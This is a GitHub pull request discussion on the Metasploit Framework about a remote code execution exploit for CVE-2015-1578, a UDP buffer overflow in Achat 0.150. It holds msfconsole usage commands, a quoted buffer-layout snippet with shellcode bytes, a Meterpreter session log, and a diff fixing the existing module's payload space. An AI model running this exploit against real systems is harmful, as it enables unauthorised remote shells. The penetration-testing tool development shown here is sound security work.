Skip to content

Achat 0.150 UDP buffer overflow exploit (CVE-2015-1578) with automated msfvenom payload #20333

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
wants to merge 1 commit into from

Conversation

yaldobaoth
Copy link

CVE-2015-1578 Metasploit Module

Overview

This is a Metasploit module for CVE-2015-1578, a buffer overflow vulnerability in Achat 0.150 beta7 on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

Purpose

The existing module at exploit/windows/misc/achat_bof suffers from payload encoding issues that cause unreliable exploitation. This new module addresses that problem by integrating an automatic msfvenom shellcode generation step, producing a properly encoded, Unicode-compatible payload externally. This approach circumvents the internal Metasploit encoder limitations and significantly improves exploit reliability.

Additionally, this vulnerability (CVE-2015-1578) remains relevant today, as it is actively exploited in the Hack The Box machine Chatterbox, demonstrating the practical value of maintaining a functional and stable exploit module.

This module demonstrates:

  • Dynamic Unicode-encoded shellcode generation via msfvenom
  • Manual payload injection (bypassing Metasploit's internal payload encoder)
  • Simple UDP-based delivery mechanism
  • Integration into the Metasploit Framework using custom module loading

Video Tutorial

Video Tutorial

Dependencies

  • Metasploit Framework
  • msfvenom in your $PATH

Key Features

  • Uses msfvenom to generate payload with x86/unicode_mixed encoding and custom bad characters
  • Avoids Metasploit’s built-in payload encoding system to work around encoder limitations

Options

  • RHOSTS – Target IP address (required)
  • LHOST – Local host IP for reverse shell (required)
  • LPORT – Local port for reverse shell (default: 4444)
  • RPORT – Remote UDP port on target (default: 9256)

Usage Example

msfconsole
use exploit/windows/misc/achat_bof_msfvenom
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

This will:

  • Generate a Unicode-compatible reverse shell payload with msfvenom
  • Inject it into the vulnerable Achat buffer over UDP
  • Listen for the shell on the specified LHOST:LPORT

Supplementary References

Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I see we already have an exploit for this in exploits/windows/misc/achat_bof.rb. What is this adding that's not already present in that exploit? If there's a new target, can we just update the existing module?

Nevermind, I should have read the PR description.

The existing module at exploit/windows/misc/achat_bof suffers from payload encoding issues that cause unreliable exploitation. This new module addresses that problem by integrating an automatic msfvenom shellcode generation step, producing a properly encoded, Unicode-compatible payload externally.

This needs to be fixed in the existing module without running msfvenom. The Targets hash is probably not setting all of the bad characters which is causing the encoded payload to be incompatible. If that's the case, it should be ~1 line fix to the original. Alternatively, you can force an encoder using the EncoderType option which I see the existing module is already doing.

#
# Note: Requires msfvenom to be in PATH. If missing or fails, the module will print an error.
##
def generate_payload_raw
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should all be handled for you by simply using payload.encoded if the Target information is correct. We don't need to be executing msfvenom, it's slower than using the already loaded version of framework and introduces opportunities for OS command injection.

I suggest you look through other exploit modules and see how they're defining their Targets key in their module data to achieve this.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Once you've stopped running msfvenom, this file name won't make much sense.

@smcintyre-r7
Copy link
Contributor

Instead of rewriting the entire exploit, take the original achat_bof and try updating the Space, which is probably why the payload isn't working any more.

I'd bump it up to say 1,500 from 730. I can see from my limited testing, that'll at least allow the exploit to run. If the exploit fails against a vulnerable target, I'd decrease the size by 100 until it either works or you're back to 730, or it's saying that it can't encode the payload again.

Give the buffer layout in the exploit, it seems reasonable that you could just increase the size of the available space.

sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 - 3) # put address of the payload to EAX
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
sploit << "\x00" + 'A' * 10 + "\x00"

I'm basing that on the observation that first_stage and target_ret are located before the payload meaning that if the payload is larger, it's not going to shift their offsets. Give that a shot and let's see if we can fix the existing exploit.

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 25, 2025
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Jun 25, 2025

I had a minute so I went and looked into this. My suspicion was correct, if you increase the space available, the framework will know that the payload will fit and the exploit will resume functioning. I tested a bump from 730 up to 1200. That's most likely large enough for all of the current stagers, so I didn't test increasing it any further.

If you want to fix this issue, can you please revert the commit adding the new module and change this line from 730 to 1200.

msf6 exploit(windows/misc/achat_bof) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (177734 bytes) to 192.168.159.169
[*] Sending stage (177734 bytes) to 192.168.159.169
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.169:49187) at 2025-06-25 14:40:54 -0400
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.169:49186) at 2025-06-25 14:40:54 -0400

meterpreter > getuid
Server username: WIN-7SKMF9FBS9E\smcintyre
meterpreter > exit
[*] Shutting down session: 6
[*] 192.168.159.169 - Meterpreter session 5 closed.  Reason: Died

[*] 192.168.159.169 - Meterpreter session 6 closed.  Reason: Died
msf6 exploit(windows/misc/achat_bof) > git diff
[*] exec: git diff

diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb
index de9825c494..230fab4119 100644
--- a/modules/exploits/windows/misc/achat_bof.rb
+++ b/modules/exploits/windows/misc/achat_bof.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Payload' => {
           'DisableNops' => true,
-          'Space' => 730,
+          'Space' => 1200,
           'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
           'StackAdjustment' => -3500,
           'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
msf6 exploit(windows/misc/achat_bof) > 

Tested achat 0.150 on Windows 7 SP1.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants